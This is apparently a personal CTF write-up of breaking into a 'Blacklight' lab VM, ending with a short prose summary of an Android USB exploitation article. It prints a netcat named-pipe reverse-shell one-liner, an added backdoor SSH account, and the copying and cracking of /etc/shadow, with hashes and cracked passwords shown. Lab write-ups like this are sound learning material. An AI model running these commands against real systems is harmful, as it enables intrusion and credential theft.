The file lists two previously unknown files: flag1.txt and blacklight.dict. The first flag is contained in the former, along with the text 9072. The secret is at home.. 9072 looks like a port number, let's check it with by increasing the scanned port range: db_nmap -A -T4 -vvv -p- 10.0.2.4. This reveals the port is open, and has a fingerprint containing "BLACKLIGHT console mk1. Type .help for instructions".
Let's try accessing this console:
- Accessing 10.0.2.4:9072 with a browser reveals nothing
ssh 10.0.2.4 -p 9072doesn't form a connectiontelnet 10.0.2.4 9072opens a CLI with the former fingerprint!- .help gives a list of available commands: .help, .readhash, .exec and .quit.
- typing the command .readhash outputs a hash and the text "You have one more command until the server shuts down. Choose wisely!"
- .quit and .help can be entered without an effect
- .readhash shuts down the telnet connection and prevents a new one from being formed
- restarting the VM gives access to a fresh telnet session with another set of commands usable
With an open telnet session to the machine and a limited set of commands to use, the most obvious need is to gain more commands. Resetting the VM and using the .exec command to surf through folders is not feasible, so creating a backdoor seems like the way to go. I used PentestMonkeys cheat sheet to create a reverse shell on the machine, by running nc -lvp 2048 on the Kali host and .exec rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.15 2048 >/tmp/f on the target machine (nc -e /bin/sh 10.0.2.4 2048 returned the command limit warning). This opened up a backdoor for me to freely use, with no command limit!. Using the reverse shell, gaining more information was easy. whoami, as well as pwd, revealed that I was already using the root account. Now, while being root is nice, I still had some more questions.
Following the previous clue, I went straight for the /home directory, where the files console.rb contained the script for the telnet console, and hash.txt contained some kind of a hash. Using ls -al reveals something interesting, a hidden directory called .secret, which contains an image called flag2-inside.jpg. It's time to exfiltrate the discovered items to the Kali machine for more analysis. For some reason, connecting back to the Kali machine via SSH failed, despite making sure the SSH server was running and the root account was enabled for SSH login. Fast fix (since security is lacking): create new account on target machine so that I can copy the files over SSH. Other than the previously found hash.txt and flag2-inside.jpg, the following files seemed interesting to me as well:
- /etc/passwd
- /etc/shadow
- /home/blacklight/.bash_history (uncleared, shows the whole setup of the machine)
I proceeded to crack the password for the "blacklight" user. I couldn't copy the /etc/shadow file directly, so I piped its contents to another file in my reverse shell. I then downloaded the file, and attacked it with JackTheRipper using the blacklight.dict file listed in robots.txt.
The cracked password table, showing the blacklight account and the "kali" account I created for the SSH:
| user | password | hash | formats |
|---|---|---|---|
| blacklight | iambl | $6$texGNuBGCuqEdBGb$emgzHwzr7mWo2R2FHvrZ9buysY.bTfzqZsE0OOXTNPcMQNOsCqw56zd4LPmYYb.hD7ErtQDOa1QqkPqM4EP6m0 | sha512crypt,crypt |
| kali | kali | $6$BRmykSID$tPbu5QDZcmQIBoXztXBQCg.dAC.UagEyE0RB2kqLms3BfhPoWgohsXoJ6SJvIp/CGmtIRJ2z7/1wsKCwxoras. | sha512crypt,crypt |
The image file just contains the message "Good job. The flag is hidden in this image. To get it OUT you must GUESS.". Steganography, then? strings and exif reveal nothing, and stegosuite refuses to install (403 errors for package installs, something wrong with the Virtualbox network?). The bash history reveals a package called outguess_0.2-8_amd64.deb was installed, so I searched for that online, and found a tool for inserting text into an image file. I installed it from http://cdn-fastly.deb.debian.org/debian/pool/main/o/outguess/ and decoded the file with the command outguess -r flag2-inside.jpg output.txt. The resulting file contained the following text:
{flag2:88ea7554cbc7e89526943e9ad5d3ce2ed5ec3db4}
Francis Bacon says:
BAAAAAABAAAAAAAAAABB AABAABAABAAAABA AAAABAAAAAAAABAABBABABBAA
Looks like a binary code to me:
10000001000000000011 001001001000010 0000100000000100110101100
01111110111111111100 110110110111101 1111011111111011001010011
I couldn't get anything from this, so I chose to stop my exploration here. A commenter on one of the walkthroughs hinted at a third flag on the system, but no walkthroughs really went beyond getting the reverse shell access as root.
Considering my earlier .apk backdoor and a fondness for Android phones in general, the article OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB caught my eye immediately. I also appreciate the honesty with which the author reveals security flaws in Googles own mobile OS. Of course, the article was only published about a week and a half after the holes were fixed with security patches.
The described vulnerability consists of exploiting a couple of different weak configurations, which allowed an attacker to fool the Android device into launching a backdoor process. The flaw was used by first creating a carefully crafted USB drive, with precisely defined partitions that tricked the phone's file system. After injecting the malware into the Android OS, an existing process was forcefully crashed, after which the system unkowingly restarted an infected version of the same process.
The result of applying this malware properly was full access to even locked devices, ranging from a system backdoor to direct access to the users' files.